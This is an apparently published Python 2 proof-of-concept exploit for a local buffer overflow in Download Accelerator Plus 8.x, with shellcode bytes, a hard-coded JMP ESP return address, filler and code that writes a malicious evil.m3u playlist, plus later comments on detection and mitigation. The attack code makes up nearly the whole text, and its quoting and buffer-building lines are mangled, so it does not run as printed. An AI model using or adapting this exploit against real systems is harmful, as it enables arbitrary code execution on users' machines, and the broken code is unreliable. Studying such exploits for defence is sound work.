#!/usr/bin/python
# Download Accelerator Plus – DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
# NOTE(review): the quote characters and backslash escapes in this listing were
# mangled during extraction, so the text below is not valid Python as printed.
# It is kept verbatim as a record of the published proof of concept.
# The syntax (print statement, str written to a 'wb' file) is Python 2.
#
# Payload bytes. The header comment describes them as a Windows
# "execute command" payload that launches calc; this was not verified here.
shellcode = (
"\\x6a\\x22\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x8d\\x6c\\xf6"
"\\xb2\\x83\\xeb\\xfc\\xe2\\xf4\\x71\\x84\\xb2\\xb2\\x8d\\x6c\\x7d\\xf7\\xb1\\xe7"
"\\x8a\\xb7\\xf5\\x6d\\x19\\x39\\xc2\\x74\\x7d\\xed\\xad\\x6d\\x1d\\xfb\\x06\\x58"
"\\x7d\\xb3\\x63\\x5d\\x36\\x2b\\x21\\xe8\\x36\\xc6\\x8a\\xad\\x3c\\xbf\\x8c\\xae"
"\\x1d\\x46\\xb6\\x38\\xd2\\xb6\\xf8\\x89\\x7d\\xed\\xa9\\x6d\\x1d\\xd4\\x06\\x60"
"\\xbd\\x39\\xd2\\x70\\xf7\\x59\\x06\\x70\\x7d\\xb3\\x66\\xe5\\xaa\\x96\\x89\\xaf"
"\\xc7\\x72\\xe9\\xe7\\xb6\\x82\\x08\\xac\\x8e\\xbe\\x06\\x2c\\xfa\\x39\\xfd\\x70"
"\\x5b\\x39\\xe5\\x64\\x1d\\xbb\\x06\\xec\\x46\\xb2\\x8d\\x6c\\x7d\\xda\\xb1\\x33"
"\\xc7\\x44\\xed\\x3a\\x7f\\x4a\\x0e\\xac\\x8d\\xe2\\xe5\\x9c\\x7c\\xb6\\xd2\\x04"
"\\x6e\\x4c\\x07\\x62\\xa1\\x4d\\x6a\\x0f\\x97\\xde\\xee\\x6c\\xf6\\xb2")
# Hard-coded return address. Per the author's comment it points at a JMP ESP
# instruction inside one specific SHELL32.DLL build, so the technique is tied to
# that OS build and language. ASLR (Windows Vista and later) randomizes module
# load addresses, and DEP marks the stack non-executable; either one defeats a
# fixed-address, execute-from-stack approach like this.
RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
# Playlist entry template: an http URL whose file-name part is filled in at %s.
# Presumably the application copies this URL into a fixed-size stack buffer
# without a length check when "Verify" is used; the page does not show the
# vulnerable code, so confirm against a vendor advisory.
m3u = \’http://localhost/verify_me________________________________%s.mp3\’
# 14074 filler bytes. The length presumably corresponds to the distance to the
# saved return address in the tested 8.6 build; not verifiable from this page.
buf = \’A\’ * 14074
# RET packed as a little-endian unsigned 32-bit value ('<L').
buf = pack(\'<L\’, RET)
# 32 bytes of 0x90 (x86 NOP).
buf = \’\\x90\’ * 32
buf = shellcode
# Substitute buf into the URL template with %-formatting.
m3u %= buf
# Write the playlist to evil.m3u in the current working directory, binary mode.
# Detection: a single playlist URL of more than 14 KB that contains
# non-printable bytes does not occur in legitimate .m3u files, so file and
# gateway scanners can flag on line length and byte range.
# Mitigation: do not import playlists from untrusted sources into the affected
# 8.x versions, and check with the vendor for a fixed release.
fd = open(\’evil.m3u\’, \’wb\’)
fd.write(m3u)
fd.close()
# The trigger described by the author is user interaction: importing the file
# and clicking "Verify" in the application.
print \’DONE, import the evil.m3u and click "Verify"\’
# EoF